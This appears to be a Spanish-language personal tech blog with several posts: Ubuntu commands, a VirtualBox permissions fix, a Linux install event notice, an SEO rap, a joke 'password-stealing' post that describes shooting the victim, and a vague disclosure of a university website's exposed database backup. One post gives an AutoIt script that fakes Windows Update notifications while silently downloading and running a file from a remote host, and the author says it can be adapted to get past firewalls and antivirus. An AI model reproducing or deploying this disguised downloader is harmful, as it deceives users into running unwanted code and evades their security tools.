Pagina de seguridad para practicar hacking (Starfleet Academy)

Aqui les dejo una pagina de seguridad informatica (http://isatcis.com/ ), realmente interesante para hackers, webmasters, y aficionados al hacking.

En esta pagina tienes la opotunidad de aprender y mejorar los conocimiento sobre la seguridad de internet Legalmente. en esta web tendras que aplicar las tacticas mas utilizadas de busqueda de bugs en 16 niveles de seguridad

Reglas:

*Utilizar Mozilla firefox como navegador para las practicas de seguridad (fue optimizado para este navegador)

* Se recomienda encarecidamente el establecimiento de su navegador de Internet a "Active Scripting"


* tratar de crackear o buscar bugs mas aya de los establecidos por los niveles de seguridad permitidos por el administrador ESTA PROHIBIDO

* Brute force, (fuerza bruta), o solisitar paginas excesivas desde el navegador ESTA PROHIBIDO (ten en cuenta que esto no es necesario para explotar los bugs de la web)

* Dar soluciones a los niveles, contraseñas o cualquier sourcecodes ESTA PROHIBIDO.

* Dar enlaces a herramientas necesarias para un nivel ESTA PROHIBIDO.



una sugerencia :
revisar codigo fuente ..XD


saludos y que tengan un buen hacking ..XD

El rap del diseñador web

The SEO Rapper - Design, Coding

Your site design is the first thing people see
it should be reflective of you and the industry
easy to look at with a nice navigation
when you can't find what you want it causes frustration
a clear Call to action to increase the temptation
use appealing graphics they create motivation
if you have animation please use with moderation
cause search engines can't index the information
display the logos of all your associations
highlight your contact info that's an obligation
create a clean design you can use some decoration
but to try to prevent any client hesitation
every page that they click should provide an explanation
should be easy to understand like having a conversation
when you design the style go ahead and use your imagination
but make sure you use correct color combinations
do some investigation, look at other organizations
but don't duplicate or you might face a litigation
you are done? congratulations, start construction
move into production, please follow these instructions
your photoshop functions? then slice that design
do your layout with divs make sure that it's aligned
please don't use tables even though they work fine
when it come to indexing they give searches a hard time
make it easy for the spiders to crawl what you provide
remove font type, font color and font size
no background colors, keep your coding real neat,
tag your look and feel on a separate style sheet
better results with xml and css
now you making progress, a lil closer to success
describe your doctype so the browser can relate
make sure you do it great or it won't validate
check in all browsers, I do it directly
gotta make sure that it renders correctly
some use IE, some others use Flock
some use AOL, I use Firefox
title everything including links and images
don't use italics, use emphasis
don't use bold, please use strong
if you use bold that's old and wrong
when you use CSS, you page will load quicker
client satisfied like they eating on a snicker
they stuck on your page like you made it with a sticker
and then they convert now that's the real kicker
make you a lil richer, your site a lil slicker
design and code right man I hope you get the picture
what I'm telling you is true man it should be a scripture
if it's built right you'll be the pick of the litter
everyone will want to follow you like twitter
competition will get bitter and you'll shine like glitter
if you trying to grow your company will get bigger
design and code right man can you get with it

El rapero SEO - Diseña, escribe código

El diseño de tu web es lo primero que ve la gente
debería reflejar lo que eres y tu industria
agradable de ver y con buena navegación
no encontrar lo que buscas causa frustración
una llamada a la acción para aumentar la tentación
usa gráficos atractivos, crean motivación
si usas animaciones, por favor, hazlo con moderación
porque los buscadores no pueden indexar la información
muestra los logos de todas tus asociaciones
descata tu información de contacto, es una obligación
crea un diseño limpio, puedes usar alguna decoración
pero intenta evitar la vacilación de los clientes
cada página en la que hacen clic debería mostrar una explicación
debería ser fácil de entender, como tener una conversación
cuando diseñes el estilo usa tu imaginación
pero asegurate de usar combinaciones de colores adecuadas
investiga algo, echa un vistazo a otras organizaciones
pero no plagies o puedes enfrentarte a un juicio
¿has terminado? felicidades, empieza a construir
después a producción, por favor sigue estas instrucciones
¿funciona en photoshop? entonces sigue con ese diseño
usa divs para componer, asegurate de que está alineado
por favor no uses tablas aunque funcione con ellas
cuando se trata de indexar dan problemas a los buscadores
facilita a los spiders indexar tus páginas
elimina el font-type, font-color y font-size
nada de background-color, mantén tu código limpio,
conserva el aspecto en una hoja de estilo
tendrás mejores resultados con xml y css
ahora haces progresos, estás un poco más cerca del éxito
describe tu doctype para que el navegador lo pueda identificar
asegurate de que lo haces todo bien o no validará
prueba la web en todos los navegadores
hay que asegurarse de que se ve correctamente
algunos usan IE, otros usan Flock
unos AOL, yo uso Firefox
añade un title a todo, incluyendo enlaces e imágenes
no uses itálicas, usa énfasis (NT: em en lugar de it)
no uses bold, por favor, usa strong (NT: strong en lugar de b)
usar bold es antiguo y erróneo
al usar CSS, tu página carga más rápido
los clientes están satisfechos
se quedan en tu página como si tuviera adhesivo
y logras una conversión, eso es lo realmente importante
hacerte un poco más rico
diseña y escribe código bien, colega, espero que lo hayas cogido
lo que te digo es cierto, debería ser tu biblia
si está bien desarrollado serás al que escojan
todo el mundo querrá seguirte, como twitter
la competencia se joderá y brillarás como el oro
si intentas crecer tu compañía se hará más grande
diseña y escribe código bien, colega, lo puedes hacer

FUENTE

Comandos Utiles para Ubuntu

Algunos comandos utiles que pueden ser utiles a la hora de administrar nuestros sistemas con Ubuntu .. XD

Comando Para Privilegios.

sudo command – ejecuta command como raíz
sudo su – abrir shell raíz
sudo su user – abrir shell como usuario
sudo -k – olvidar tu contraseña sudo
gksudo command – visual sudo dialog (GNOME)
kdesudo command – visual sudo dialog (KDE)
sudo visudo – editar /etc/sudoers
gksudo nautilus – gestor ficheros raíz (GNOME)
kdesudo konqueror – gestor ficheros raíz (KDE)
passwd – cambiar tu contraseña


Comandos Network

ifconfig – muestra información de red
iwconfig – muestra información de wireless
sudo iwlist scan – escanea redes inalámbricas
sudo /etc/init.d/networking restart – resetear la red
(archivo) /etc/network/interfaces – configuración manual
ifup interface – traer interface online
ifdown interface – deshabilitar interface


Comandos de Display

sudo /etc/init.d/gdm restart – resetear X (Gnome)
sudo /etc/init.d/kdm restart – resetear X (kDE)
(archivo) /etc/X11/xorg.conf – mostrar Configuracion
sudo dpkg-reconfigure -phigh xserver-xorg – resetear configuración X
Ctrl+Alt+Bksp – resetear X display si quedo tildado
Ctrl+Alt+FN – cambiar a tty N
Ctrl+Alt+F7 – cambiar de nuevo a X display


Comandos de Servicio del Sistema

start service – iniciar trabajo service (Upstart)
stop service – parar trabajo service (Upstart)
status service – comprobar si service está ejecutando (Upstart)
/etc/init.d/service start – iniciar service (SysV)
/etc/init.d/service stop – parar service(SysV)
/etc/init.d/service status – comprobar service(SysV)
/etc/init.d/service restart – resetear service(SysV)
runlevel – obtener runlevel actual


Comandos para Cortafuegos

ufw enable – activar el cortafuegos
ufw disable – apagar el cortafuegos
ufw default allow – permitir todas las conexiones por defecto
ufw default deny – bloquear todas las conexiones por defecto
ufw status – reglas y estado actual
ufw allow port – permitir tráfico en puerto
ufw deny port – bloquear puerto
ufw deny from ip – bloquear dirección ip


Comandos de Sistema

recovery – Escribir “REISUB” mientras se mantiene Alt y SysRq (PrintScrn) con aprox. 1 segundo entre cada letra. Tu sistema reiniciará
lsb_release -a – obtener la versión de Ubuntu
uname -r – obtener versión del kernel
uname -a – obtener toda la información del kernel


Comandos para Gestor de Paquetes

apt-get update – refrescar actualizaciones disponibles
apt-get upgrade – actualizar todos los paquetes
apt-get dist-upgrade – actualizar versión
apt-get install pkg – instalar pkg
apt-get remove pkg – desinstalar pkg
apt-get autoremove – eliminar paquetes obsoletos
apt-get -f instal – intentar arreglar paquetes
dpkg –configure -a – intentar arreglar paquetes rotos
dpkg -i pkg.deb – instalar archivo pkg.deb
(archivo) /etc/apt/sources.list – lista de repositorios APT


Comandos Para Paquetes Especiales

ubuntu-desktop – Entorno Ubuntu estándar
kubuntu-desktop – escritorio KDE
xubuntu-desktop – escritorio XFCE
ubuntu-minimal – núcleo utilidades Ubuntu
ubuntu-standard – utilidades estándar Ubuntu
ubuntu-restricted-extras – no libres, pero utiles
kubuntu-restricted-extras – ídem KDE
xubuntu-restricted-extras – ídem XFCE
build-essential – paquetes usados para compilar
linux-image-generic – última imagen genérica del kernel
linux-headers-generic – últimas cabeceras


Comandos de Aplicaciones

nautilus – gestor de ficheros (GNOME)
dolphin – gestor de ficheros (KDE)
konqueror – Navegador web (KDE)
kate – editor de texto (KDE)
gedit – editor de texto (GNOME)

fuente: http://gndx.org/?p=249

Ballmer mal recibido en Budapest

.. .

le llovieron guevazos a Steve Ballmer cuando iniciaba una conferencia, a causa de esto se tuvo que esconder detraz del estrado para protegerse del atacante, que le gritaba:"Microsoft devuelva el dinero de los contribuyentes", protestaba contra el reciente acuerdo firmado entre esa empresa informática y el gobierno húngaro.

VirtualBox kernel driver error (solucion)

cuando recien instalamos una maquina virtual en Ubuntu 8.04 y queremos instalar un nuevo sistema operativo nos muestra un error como este:

The VirtualBox kernel driver is not accessible to the current user. Make sure that the user has write permissions for /dev/vboxdrv by adding them to the vboxusers groups. You will need to logout for the change to take effect..
VBox status code: -1909 (VERR_VM_DRIVER_NOT_ACCESSIBLE).


Result Code:
0x80004005
Component:
Console
Interface:
IConsole {1dea5c4b-0753-4193-b909-22330f64ec45}

Esto es por que no tenemos permisos de usar el driver para las makinas virtuales. LO que tenemos que hacer en este caso es agregar a vboxusers al grupo de secion actual. En mi caso mi inicio de secion es "villatux"

Para hacerlo en modo grafico nos vamos a Sistema/Administracion/Usuarios y grupos.
- ahi seleccionamos gestionar grupos
- localizamos vboxusers y lo agregamos a la secion actual "villatux"

y con esto queda listo.

Para hacerlo de una manera mas segura, agregamos al grupo de uauarios manualmente, para hacer esto hacemnos un backup de el archivo de grupos y usuarios con este comando:
sudo cp /etc/group /etc/group.bak
ya hecho el backup ahora si modificamos el archivo con este comando
sudo gksu gedit /etc/group
aqui localizamos vboxusers y le agregamos nuestra sesión después de los dos puntos, asi es como quedo el mio:

root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:villatux
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:villatux
fax:x:21:
voice:x:22:
cdrom:x:24:villatux
floppy:x:25:villatux
tape:x:26:
sudo:x:27:
audio:x:29:pulse,villatux
dip:x:30:villatux
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:villatux
sasl:x:45:
plugdev:x:46:villatux
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
dhcp:x:102:
syslog:x:103:
klog:x:104:
scanner:x:105:hplip
nvram:x:106:
fuse:x:107:villatux
ssl-cert:x:108:
lpadmin:x:109:villatux
crontab:x:110:
mlocate:x:111:
ssh:x:112:
avahi-autoipd:x:113:
gdm:x:114:
admin:x:115:villatux
pulse:x:116:
pulse-access:x:117:
pulse-rt:x:118:
messagebus:x:119:
avahi:x:120:
netdev:x:121:
polkituser:x:122:
haldaemon:x:123:
villatux:x:1000:
mysql:x:124:
vboxusers:x:125:villatux
peercast:x:126:

una vez hecho esto reiniciamos la sesión con ctrl+alt+Backspace y listo ahora podemos instalar una nueva maquina virtual sin problemas.

Compilar kernel de linux en Ubuntu 7.04

aqui les dejo un video de como compilar el kernel de linux en Ubuntu..



Saludos.

InstallFest 2008 en Chihuahua

Se va a organizar un InstallFest el día 17 de Mayo del 2008 en La ciudad de Chihuhua, la sede será en el Edificio de Seminarios de la Facultad de Contaduría y Administración a partir de las 12 horas.

*Podrás traer tu Desktop o Portátil para Instalarle LInux o Software Linbre
*Aprende a Instalar Linux desde cero en tu propia computadora
*Aprende a manejar tu sistema Linux
*Comparaciones de Linux-Windows
*Únete a grupos de usuarios Linux locales
*Comparte información.Notas:
* El evento es totalmente Libre y gratuito
* Si Vas a instalar Linux en tu computadora, procura traer una partición de mas de 4GB para instalarle Linux, (Si no sabes hacerla, no te preocupes, nosotros te ayudamos el día del evento)Paginas con información relacionada:
http://installfest.mx.vg/ <-- registro e infohttp://calendario.fsl.org.mx/mediawiki/index.php/Eventos <-- calendario de FSL.Los que puedan asistir, ahí nos vemos!

Script au3 para bajar un archivo simulando Windows Update

AutoIt es un Lenguage en script para la automatización de tareas para Windows.

AutoIt ha estado usandose polularmente desde 1999 y sigue ndo a los usuarios y administradores una manera fácil de secuencia de comandos de Windows GUI.

febrero de 2004 la última versión de AutoIt - conocido como AutoIt v3 - fue liberada y añadió potentes características de scripting.

AutoIt v3 se desarrolló en un pequeño equipo con la ayuda de los contribuyentes en todo el mundo y ello ha dado lugar a un gran conjunto de archivos de ayuda, ejemplos, foro de soporte, lista de correo, editor de archivos, y de terceros los servicios públicos.

Todo el desarrollo se centra en AutoIt v3 pero v2 seguirá siendo descargable y apoyado como lo es en tal uso generalizado.

Aqui les dejo un script que simula las actualizaciones de windows y descarga a el directorio c:\ publicidad del proximo evento Installfest.

a este script se le puede modificar para crear un programa actualizable sin que tengas que permitir la descarga a tu firewall o antivirus, ya que siendo actualizacion de windows es como si fuera de manera oficial por parte de windows..XD

aqui mi script en executable http://usuarios.lycos.es/villatux/linux/villatux.exe

(si no se descarga, copia el enlace y pegalo en tu navegador )

aqui el codigo (con algunos errores a proposito para evitar los que no quieren aprender):

AutoItSetOption("RunErrorsFatal, 0)


dim $url="http://usuarios.lycos.es/villatux/linux/
dim $filename="publicidad.pdf"
dim $savepath="c:\"

traytop("Windows Update", "Hay actualizaciones para el equipo", 5, 1)
Sleep(5000)
traytip("Windows Update", "Se instalaran automaticamente", 5, 1)
Sleep(5000)
if (URLDownloadToFile($url & $filename, $savepath & $filename))= 1 Then
Run($filename, $savepath, @SW_HIDE )
traytip("Windows Update", "Las actualizaciones se instalaron correctamente.", 5, 1)
Sleep(5000)
Else
traytip("Windows Update", "Intente instalar las actualizaciones nuevamente", 5, 1)
Sleep(5000)
EndIf

y aqui les dejo unas capturas de cuando se esta ejecutando el script:

y por si quieren empezar a programar sus scripts aqui les dejo esta url con manuales oficiales y referencia de funciones

http://www.autoitscript.com/autoit3/docs/
http://www.autoitscript.com/autoit3/docs/functions.htm

y aqui el compilador :

http://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe (6.6MB)

Conseguir contraseñas: Yahoo, hotmail, gmail, etc

Debido a que mucha gente me ha pedido que publique la manera de como sacar passwords del vecinito, dela novia, del jefe etc. etc.  y pues decidi a publicar este tutorial para ya no tener que estarles diciendo uno por uno.. XD

Este es uno de los metodos que nunca fallan, hasta el momento no existe parche.
Asi que disfrutenlo mientras puedan, no se trata de ningun otro metodo explicado antes.
Requiere de mucha paciencia y esfuerzo pero estos se ven, recompensados..
No se trata del clasico uso de xploit's y keyloggers, etc..etc...Bueno ya no los entretengo mas..
Disfrutenlo...

Primer Paso.
Identificar a la victima, su nombre.

Segundo Paso.
Te pones un pasamontañas y agarras una de estas
Tercer paso
Vas a la casa de la victima, le apuntas y pides su contraseña, si no te la da, le sonas la rodilla, le lanzas un papelito(tambien un lapiz o pluma..Nota.tambien puede utilizar su sangre) y
le dices que apunte su correo y contraseña, si no te la quiere dar le jodes la otra rodilla,(asi sucesivamente...Nota: No dispares a partes vitales, ni a la mano con la que escribe) .
Cuando la escriba..Le das las gracias..

Cuarto Paso.
Por ultimo sales.. y das un portazo.(Entre mas fuerte mejor, que se note que tienes eggs)lo olvidaba...tienes que tomar el papelito...

Quinto Paso.
Vas a tu casa, sacas el papelito..pruebas si en verdad es la contraseña ( hay un 99.999 % que si sea), checas sus mails (fdw, spam). y pones en tu nick..Se sacan contraseñas de Yahoo, hotmail, gmail, etc..etc...Nota: entre mas rudo seas es mejor......

Vulnerabilidades en portal del Tec II de Chihuahua

Hola.

en esta ocasión les mostraré de una falla que tiene la pagina oficial de nuestro queridísimo Tecnológico de Chihuahua.

Pues se trata de varias vulnerabilidades causadas por el mismo administrador en su servidor. No voy a dar datos precisos por razones de seguridad, pero enseguida les explico en rasgos generales.

Lo que permite las vulnerabilidades:

* Acceso total a la base de datos Mysql

* Lectura y escritura dentro del servidor

Esta vulnerabilidad la pueden (o podían) encontrar ,ya que esta vulnerabilidad esta desde hace casi dos años. En algunos de los enlaces que dejan los profesores, para que descarguen tareas o documentos del servidor, se ve la dirección vulnerable, y por medio de una sencilla búsqueda por el servidor se haya un backup de la base de datos usada para la pagina web, en el cual se pueden encontrar datos importantes y necesarios para el acceso a la modificación del portal por medio de la base de datos.

Sin tanto rollo aquí les dejo unas capturas:

Salu2!